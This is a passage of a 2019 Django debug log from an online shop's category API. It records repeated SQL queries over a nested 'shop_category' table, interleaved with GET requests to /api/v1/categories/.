"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:42,309 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:42,313 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:53,898 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:53,906 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:53,909 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-16 07:10:53,914 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:53,917 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:53,920 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:53,925 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:10:53] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-16 07:10:53,929 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:53,933 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:53,937 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:53,941 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:53,947 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:53,950 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:53,953 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:53,956 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:53,959 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:53,963 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:53,967 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:53,970 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:53,973 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:53,976 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:53,981 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:53,984 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:53,987 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:53,990 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:53,993 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:53,995 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:54,000 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:54,003 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:54,006 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:54,009 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:54,012 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:54,016 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:54,019 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:54,022 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:54,025 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:54,029 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:54,036 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:54,039 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:54,043 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:54,047 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:54,051 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:54,055 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:54,060 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:54,064 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:54,068 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:54,073 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:54,077 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:56,908 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:56,918 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-16 07:10:56,924 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:56,929 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:56,934 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:56,939 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:56,945 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:10:56] "GET /api/v1/categories/7 HTTP/1.0" 200 998 DEBUG 2019-12-16 07:10:56,950 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:56,954 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:56,957 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:56,961 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:56,967 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:56,970 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:56,974 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:56,978 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:56,982 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:56,988 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 